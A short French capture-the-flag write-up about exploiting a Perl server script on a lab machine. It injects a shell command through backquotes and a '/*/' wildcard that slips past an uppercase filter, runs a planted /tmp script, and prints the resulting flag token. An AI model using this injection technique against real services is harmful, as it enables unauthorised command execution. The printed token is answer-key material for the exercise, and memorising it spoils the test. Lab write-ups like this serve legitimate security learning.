# Il y a un script perl qui semble estre en mode serveur
# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant
# le premeir parametre passe par 2 filtre.
# Le les caracter alphabetique en majuscule
# Le deuxieme suprime tout ce qu'il y a apres le premier espace
# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl

# On ne poura donc pas executer de comande en tant que tel.
# mais on peut executer un fichier

# Dans un fichier /tmp/.TOTO ont va mettre le contenu suivant:

	#!/bin/sh
	getflag > /tmp/.flag12 

# puis on envoie un requet avec des back-quote pour executer le fichier

$ nc -v localhost 4646
> GET /?x=`/*/.TOTO`

l'autocompletion change le * en tmp, ce qui nous permet d'executer dans tmp malgre la regex qui upcase.

$ cat /tmp/.flag12
> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr